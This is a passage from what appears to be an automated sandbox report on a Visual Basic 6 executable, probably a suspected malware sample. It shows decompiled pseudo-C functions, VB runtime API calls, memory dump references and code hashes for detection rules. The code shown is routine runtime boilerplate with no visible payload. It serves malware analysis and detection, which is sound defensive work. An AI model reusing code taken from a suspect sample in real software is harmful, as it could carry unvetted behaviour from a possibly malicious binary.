                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$CheckErrorHresultSystem
                                                                                • String ID: ControlType
                                                                                • API String ID: 2264031751-1799722345
                                                                                • Opcode ID: 3d5db9f3613f0ae59e05d343d6ba557caa3bb43035d8f9d6a913e73e48bd9124
                                                                                • Instruction ID: e588fa7e3cd09ed406906bacfaf3bae688aa11bf68797b30e330ee10e2c33fd8
                                                                                • Opcode Fuzzy Hash: 3d5db9f3613f0ae59e05d343d6ba557caa3bb43035d8f9d6a913e73e48bd9124
                                                                                • Instruction Fuzzy Hash: 98318E71A00209AFC710DFA8C985AEABBB9FB08710F10853EF549E7790D734A845CB94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00416BD0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 48%
                                                                                			E00416BD0(intOrPtr* _a4, void* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v36;
				short _t23;
				void* _t26;
				intOrPtr _t27;
				intOrPtr* _t29;
				void* _t32;
				intOrPtr* _t33;
				void* _t42;
				void* _t45;
				intOrPtr* _t46;
				intOrPtr _t48;
				intOrPtr _t49;

				 *[fs:0x0] = _t48;
				_t49 = _t48 - 0x1c;
				_v16 = _t49;
				_v12 = 0x4013d0;
				_v8 = 0;
				_t46 = _a4;
				_t23 =  *((intOrPtr*)( *_t46 + 4))(_t46, _t42, _t45, _t32,  *[fs:0x0], 0x401d26);
				__imp____vbaI2I4();
				_t33 = _t49 - 0x10;
				 *((short*)(_t46 + 0x3c)) = _t23;
				 *_t33 = 8;
				 *((intOrPtr*)(_t33 + 4)) = _v36;
				 *(_t33 + 8) = L"Alignment";
				 *((intOrPtr*)(_t33 + 0xc)) = _v28;
				_t26 =  *((intOrPtr*)( *_t46 + 0x390))(_t46);
				asm("fclex");
				if(_t26 < 0) {
					__imp____vbaHresultCheckObj(_t26, _t46, 0x40f430, 0x390);
				}
				_t14 = _t46 + 0x70; // 0x0
				_t27 =  *_t14;
				if(_t27 != 0) {
					E0040FB74();
					__imp____vbaSetSystemError(_t27);
					 *((intOrPtr*)(_t46 + 0x70)) = 0;
				}
				 *((intOrPtr*)( *_t46 + 0x8a4))(_t46);
				_t29 = _a4;
				 *((intOrPtr*)( *_t29 + 8))(_t29);
				 *[fs:0x0] = _v24;
				return _v8;
			}




















                                                                                0x00416be2
                                                                                0x00416be9
                                                                                0x00416bef
                                                                                0x00416bf2
                                                                                0x00416bfb
                                                                                0x00416bfe
                                                                                0x00416c04
                                                                                0x00416c0a
                                                                                0x00416c18
                                                                                0x00416c1c
                                                                                0x00416c25
                                                                                0x00416c2b
                                                                                0x00416c2e
                                                                                0x00416c34
                                                                                0x00416c37
                                                                                0x00416c3f
                                                                                0x00416c41
                                                                                0x00416c4f
                                                                                0x00416c4f
                                                                                0x00416c55
                                                                                0x00416c55
                                                                                0x00416c5a
                                                                                0x00416c5d
                                                                                0x00416c62
                                                                                0x00416c68
                                                                                0x00416c68
                                                                                0x00416c6e
                                                                                0x00416c74
                                                                                0x00416c7a
                                                                                0x00416c85
                                                                                0x00416c90

                                                                                APIs
                                                                                • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,00401D26), ref: 00416C0A
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,004013D0,0040F430,00000390,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00416C4F
                                                                                • __vbaSetSystemError.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00416C62
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$CheckErrorHresultSystem
                                                                                • String ID: Alignment
                                                                                • API String ID: 2264031751-2923404543
                                                                                • Opcode ID: dc9cc831a350e70b12bc6104fe780c11d2e265c18d42919cb1b26b97fa8e92cb
                                                                                • Instruction ID: ed251a81bb9f025d8f6a7ed8ee99042b48a82243ff9eb9e6aea26528592e4486
                                                                                • Opcode Fuzzy Hash: dc9cc831a350e70b12bc6104fe780c11d2e265c18d42919cb1b26b97fa8e92cb
                                                                                • Instruction Fuzzy Hash: 1F216A74A00604EFC710EF69C989A8ABBF8FF58700F10856AF989E7751D774A840CF94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041C7C0, Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • #593.MSVBVM60(?), ref: 0041C81D
                                                                                • __vbaFPInt.MSVBVM60 ref: 0041C833
                                                                                  • Part of subcall function 0041DE40: __vbaNew2.MSVBVM60(0040B730,?,00000000,?,72A1A274), ref: 0041DE8C
                                                                                  • Part of subcall function 0041DE40: __vbaHresultCheckObj.MSVBVM60(00000000,?,00411158,0000001C), ref: 0041DEB0
                                                                                  • Part of subcall function 0041DE40: __vbaFreeVar.MSVBVM60 ref: 0041DEB9
                                                                                  • Part of subcall function 0041DE40: __vbaNew2.MSVBVM60(0040B730,?), ref: 0041DED2
                                                                                  • Part of subcall function 0041DE40: __vbaNew2.MSVBVM60(0040B730,?), ref: 0041DEE6
                                                                                  • Part of subcall function 0041DE40: __vbaHresultCheckObj.MSVBVM60(00000000,72A1A237,00411158,00000020), ref: 0041DF09
                                                                                  • Part of subcall function 0041DE40: __vbaFreeVar.MSVBVM60 ref: 0041DF12
                                                                                  • Part of subcall function 0041DE40: __vbaNew2.MSVBVM60(0040B730,?), ref: 0041DF22
                                                                                  • Part of subcall function 0041DE40: __vbaHresultCheckObj.MSVBVM60(00000000,72A1A237,00411158,00000024), ref: 0041DF43
                                                                                  • Part of subcall function 0041DE40: __vbaObjSetAddref.MSVBVM60(?,?), ref: 0041DF4E
                                                                                • __vbaFreeVarList.MSVBVM60(00000003,0000000A,00000004,?,?,004016D8,?), ref: 0041C862
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,004016A0,00410B74,000006F8), ref: 0041C884
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$CheckHresultNew2$Free$#593AddrefList
                                                                                • String ID:
                                                                                • API String ID: 2661231995-0
                                                                                • Opcode ID: 8a0d7c4be2ad5797e010b10b687947322b5f077470a09713e3098923a522573a
                                                                                • Instruction ID: 7cf3442aed4ff54f4037b68df471e0c1627cf3ecc9c5bfba7c8cb884a8becf0b
                                                                                • Opcode Fuzzy Hash: 8a0d7c4be2ad5797e010b10b687947322b5f077470a09713e3098923a522573a
                                                                                • Instruction Fuzzy Hash: CD21B0B1841208EFCB00EF95DE89ADEBBB9FF44701F20415AF445B3290D7786A41CBA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00415200, Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 17%
                                                                                			E00415200(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr* _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v28;
				char _v32;
				char _v36;
				void* _t21;
				void* _t24;
				void* _t27;
				intOrPtr* _t29;
				intOrPtr* _t38;
				intOrPtr* _t39;
				void* _t40;
				void* _t42;
				intOrPtr _t43;

				_t43 = _t42 - 0xc;
				 *[fs:0x0] = _t43;
				_v16 = _t43 - 0x20;
				_v12 = 0x4012c0;
				_v8 = 0;
				_t38 = _a4;
				 *((intOrPtr*)( *_t38 + 4))(_t38, __edi, __esi, __ebx,  *[fs:0x0], 0x401d26, _t40);
				_v28 = 0;
				_v32 = 0;
				 *_a8 = 0;
				_v36 = 0;
				_t21 =  *((intOrPtr*)( *_t38 + 0x3b0))(_t38);
				_t29 = __imp____vbaObjSet;
				_t39 =  *_t29( &_v32, _t21);
				_t24 =  *((intOrPtr*)( *_t39 + 0x210))(_t39,  &_v36);
				asm("fclex");
				if(_t24 < 0) {
					__imp____vbaHresultCheckObj(_t24, _t39, 0x410414, 0x210);
				}
				_v36 = 0;
				_t27 =  *_t29( &_v28, _v36);
				__imp____vbaFreeObj();
				_push(0x4152c3);
				return _t27;
			}


















                                                                                0x00415203
                                                                                0x00415212
                                                                                0x0041521f
                                                                                0x00415222
                                                                                0x0041522b
                                                                                0x0041522e
                                                                                0x00415234
                                                                                0x0041523b
                                                                                0x0041523e
                                                                                0x00415241
                                                                                0x00415245
                                                                                0x00415248
                                                                                0x0041524e
                                                                                0x0041525b
                                                                                0x00415264
                                                                                0x0041526c
                                                                                0x0041526e
                                                                                0x0041527c
                                                                                0x0041527c
                                                                                0x00415285
                                                                                0x0041528d
                                                                                0x00415292
                                                                                0x00415298
                                                                                0x00000000

                                                                                APIs
                                                                                • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00415259
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410414,00000210,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 0041527C
                                                                                • __vbaObjSet.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 0041528D
                                                                                • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00415292
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$CheckFreeHresult
                                                                                • String ID:
                                                                                • API String ID: 444973724-0
                                                                                • Opcode ID: e3d229ab81c3a6e0dd8030c1dcc339436d853f024d631e1fb596ae0ded67646b
                                                                                • Instruction ID: bd36dc85601c0206c359d4f3cee15db34144bfa75d62af71fb66f3b2760b32f1
                                                                                • Opcode Fuzzy Hash: e3d229ab81c3a6e0dd8030c1dcc339436d853f024d631e1fb596ae0ded67646b
                                                                                • Instruction Fuzzy Hash: A7110A75900218EBCB009F99C989DDEBBFCFF98700F10455AF545E3261C77859418FA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00415B80, Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 17%
                                                                                			E00415B80(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr* _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v28;
				char _v32;
				char _v36;
				intOrPtr* _t22;
				void* _t23;
				intOrPtr* _t35;
				intOrPtr* _t36;
				void* _t37;
				void* _t39;
				intOrPtr _t40;

				_t40 = _t39 - 0xc;
				 *[fs:0x0] = _t40;
				_v16 = _t40 - 0x20;
				_v12 = 0x401330;
				_v8 = 0;
				_t35 = _a4;
				 *((intOrPtr*)( *_t35 + 4))(_t35, __edi, __esi, __ebx,  *[fs:0x0], 0x401d26, _t37);
				_v28 = 0;
				_v32 = 0;
				 *_a8 = 0;
				_v36 = 0;
				_t22 =  &_v36;
				__imp____vbaObjSet(_t22,  *((intOrPtr*)( *_t35 + 0x3b0))(_t35));
				_t36 = _t22;
				_t23 =  *((intOrPtr*)( *_t36 + 0x238))(_t36,  &_v32);
				asm("fclex");
				if(_t23 < 0) {
					__imp____vbaHresultCheckObj(_t23, _t36, 0x410414, 0x238);
				}
				_v32 = 0;
				__imp____vbaStrMove();
				__imp____vbaFreeObj();
				_push(0x415c42);
				return _t23;
			}
















                                                                                0x00415b83
                                                                                0x00415b92
                                                                                0x00415b9f
                                                                                0x00415ba2
                                                                                0x00415bab
                                                                                0x00415bae
                                                                                0x00415bb4
                                                                                0x00415bbb
                                                                                0x00415bbe
                                                                                0x00415bc1
                                                                                0x00415bc5
                                                                                0x00415bcf
                                                                                0x00415bd3
                                                                                0x00415bd9
                                                                                0x00415be2
                                                                                0x00415bea
                                                                                0x00415bec
                                                                                0x00415bfa
                                                                                0x00415bfa
                                                                                0x00415c06
                                                                                0x00415c09
                                                                                0x00415c12
                                                                                0x00415c18
                                                                                0x00000000

                                                                                APIs
                                                                                • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00415BD3
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410414,00000238,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00415BFA
                                                                                • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00415C09
                                                                                • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00415C12
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$CheckFreeHresultMove
                                                                                • String ID:
                                                                                • API String ID: 2435256576-0
                                                                                • Opcode ID: 298b69994adf7912561aadb9dbc36f2950abc1954b2e31f3cb4a3b0468f462e4
                                                                                • Instruction ID: 3f06fbb17c0cfd88f78f21d93fa592b16deff16412cf33d1d5788e9d5483ffc5
                                                                                • Opcode Fuzzy Hash: 298b69994adf7912561aadb9dbc36f2950abc1954b2e31f3cb4a3b0468f462e4
                                                                                • Instruction Fuzzy Hash: DF112875900209EBCB009F95C989EEEFBB8FF98700F10816AF542A7260D7786945CFA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041E380, Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __vbaNew2.MSVBVM60(0040B730,?,?,00401700,00000000), ref: 0041E3C3
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411158,00000028,?,00401700,00000000), ref: 0041E3E4
                                                                                • __vbaVarTextTstEq.MSVBVM60(?,?,?,00401700,00000000), ref: 0041E3F5
                                                                                • __vbaFreeVar.MSVBVM60(?,00401700,00000000), ref: 0041E400
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$CheckFreeHresultNew2Text
                                                                                • String ID:
                                                                                • API String ID: 2952808666-0
                                                                                • Opcode ID: e08154e3b0b4eb461a917fc81dc165a394d150c27bd502896b2216b85a561c8b
                                                                                • Instruction ID: 11546703d3100e9a83b5665738602d7ff57218a73727fba89aa87d467737ff6f
                                                                                • Opcode Fuzzy Hash: e08154e3b0b4eb461a917fc81dc165a394d150c27bd502896b2216b85a561c8b
                                                                                • Instruction Fuzzy Hash: 831170B5941208EBCB10DF55CA49ADEBBF8FF58741F20411AF945B3260D3786E45CBA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00421FA0, Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,004225E5,00411580,0000001C,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00422005
                                                                                • __vbaCastObjVar.MSVBVM60(?,004113E8,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00422014
                                                                                • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 0042201F
                                                                                • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00422028
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$CastCheckFreeHresult
                                                                                • String ID:
                                                                                • API String ID: 2379982908-0
                                                                                • Opcode ID: c0bed996e35696c34b6a1cb64145536443b9a75c49ddb121482aef8a4c80a54e
                                                                                • Instruction ID: 78fd0d4038b89ee32b583735ed36bf339507f3d4db6e6e2e62c21046bcdfa495
                                                                                • Opcode Fuzzy Hash: c0bed996e35696c34b6a1cb64145536443b9a75c49ddb121482aef8a4c80a54e
                                                                                • Instruction Fuzzy Hash: 65114F71A00209EFDB00DF95CA89EDEBBB8FF58701F10441AF641A31A0D7B8A941CB64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00422080, Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,0042277E,00411580,0000002C,?,?,?,?,?,?,?,00401D26), ref: 004220E1
                                                                                • __vbaCastObj.MSVBVM60(?,00411928,?,?,?,?,?,?,?,00401D26), ref: 004220F0
                                                                                • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,00401D26), ref: 004220FB
                                                                                • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,00401D26), ref: 00422104
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$CastCheckFreeHresult
                                                                                • String ID:
                                                                                • API String ID: 2379982908-0
                                                                                • Opcode ID: 8d1d3dc7ed36d14cd2e5767834dfdd98317ea27dced9835cc24fb22943071a93
                                                                                • Instruction ID: 3122528e231ee9733b64bebdc27a34127e3a96e9ede2eb1afaa1314ca064f70e
                                                                                • Opcode Fuzzy Hash: 8d1d3dc7ed36d14cd2e5767834dfdd98317ea27dced9835cc24fb22943071a93
                                                                                • Instruction Fuzzy Hash: 7B114FB0A00205AFCB009FA5CA49EAEFBB8EF54700F10851AF601E3260D678A941CB54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00421CC0, Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __vbaCastObj.MSVBVM60(00000000,00411580,?,?,?,?,?,00401D26), ref: 00421D0B
                                                                                • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,00401D26), ref: 00421D16
                                                                                • __vbaObjSetAddref.MSVBVM60(00401A9C,00000000,?,?,?,?,?,00401D26), ref: 00421D21
                                                                                • __vbaFreeObj.MSVBVM60(?,?,?,?,?,00401D26), ref: 00421D2A
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$AddrefCastFree
                                                                                • String ID:
                                                                                • API String ID: 247606873-0
                                                                                • Opcode ID: 8511083c08dd0da7740a4eed0660c5a16a5c2f5f82f0c2abd8aa876212357d87
                                                                                • Instruction ID: 93f7e4e2509867c96e9c850529fd45bb3eededa373c10e89cfb45aaf5c5ae310
                                                                                • Opcode Fuzzy Hash: 8511083c08dd0da7740a4eed0660c5a16a5c2f5f82f0c2abd8aa876212357d87
                                                                                • Instruction Fuzzy Hash: 41017C71900219FBC7009F64DE49AAEBFB8EF44744F10802AF941A72A0C77869418BD8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00421C10, Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __vbaNew.MSVBVM60(00411590,?,?,?,?,?,00401D26), ref: 00421C5A
                                                                                • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,00401D26), ref: 00421C65
                                                                                • __vbaObjSetAddref.MSVBVM60(00401A8C,00000000,?,?,?,?,?,00401D26), ref: 00421C70
                                                                                • __vbaFreeObj.MSVBVM60(?,?,?,?,?,00401D26), ref: 00421C79
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$AddrefFree
                                                                                • String ID:
                                                                                • API String ID: 1411118827-0
                                                                                • Opcode ID: bac2df534b84dd0d97f72c6f6a11b7235600f419f63e1a8bc645cf961f502211
                                                                                • Instruction ID: c760e9d14c4b6ee96e6c70bbbfa237425ebefae8802f45d7b4e6313e357449e2
                                                                                • Opcode Fuzzy Hash: bac2df534b84dd0d97f72c6f6a11b7235600f419f63e1a8bc645cf961f502211
                                                                                • Instruction Fuzzy Hash: 8A018F75900619FBC7009F65DE49AAEBFB8FF44740F10802AF942A72A0D77859418BD9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00415020, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 49%
                                                                                			E00415020(intOrPtr* _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v36;
				intOrPtr* _t23;
				void* _t24;
				void* _t27;
				intOrPtr* _t28;
				void* _t31;
				void* _t41;
				intOrPtr* _t42;
				void* _t44;
				intOrPtr* _t45;
				intOrPtr _t47;
				intOrPtr _t48;

				 *[fs:0x0] = _t47;
				_t48 = _t47 - 0x1c;
				_v16 = _t48;
				_v12 = 0x401298;
				_v8 = 0;
				_t45 = _a4;
				 *((intOrPtr*)( *_t45 + 4))(_t45, _t41, _t44, _t31,  *[fs:0x0], 0x401d26);
				_t6 = _t45 + 0x10; // 0x0
				_t23 =  *_t6;
				_t24 =  *((intOrPtr*)( *_t23 + 0x94))(_t23, _a8);
				asm("fclex");
				if(_t24 < 0) {
					_t9 = _t45 + 0x10; // 0x0
					__imp____vbaHresultCheckObj(_t24,  *_t9, 0x40f430, 0x94);
				}
				_t42 = _t48 - 0x10;
				 *_t42 = 8;
				 *((intOrPtr*)(_t42 + 4)) = _v36;
				 *(_t42 + 8) = L"Enabled";
				 *((intOrPtr*)(_t42 + 0xc)) = _v28;
				_t27 =  *((intOrPtr*)( *_t45 + 0x390))(_t45);
				asm("fclex");
				if(_t27 < 0) {
					__imp____vbaHresultCheckObj(_t27, _t45, 0x40f430, 0x390);
				}
				_t28 = _a4;
				 *((intOrPtr*)( *_t28 + 8))(_t28);
				 *[fs:0x0] = _v24;
				return _v8;
			}




















                                                                                0x00415032
                                                                                0x00415039
                                                                                0x0041503f
                                                                                0x00415042
                                                                                0x00415049
                                                                                0x00415050
                                                                                0x00415056
                                                                                0x00415059
                                                                                0x00415059
                                                                                0x00415063
                                                                                0x0041506b
                                                                                0x0041506d
                                                                                0x0041506f
                                                                                0x0041507e
                                                                                0x0041507e
                                                                                0x0041508c
                                                                                0x00415096
                                                                                0x0041509b
                                                                                0x0041509e
                                                                                0x004150a4
                                                                                0x004150a7
                                                                                0x004150af
                                                                                0x004150b1
                                                                                0x004150bf
                                                                                0x004150bf
                                                                                0x004150c5
                                                                                0x004150cb
                                                                                0x004150d6
                                                                                0x004150e1

                                                                                APIs
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040F430,00000094,?,?,?,?,?,?,?,?,?,00401D26), ref: 0041507E
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00401298,0040F430,00000390,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 004150BF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
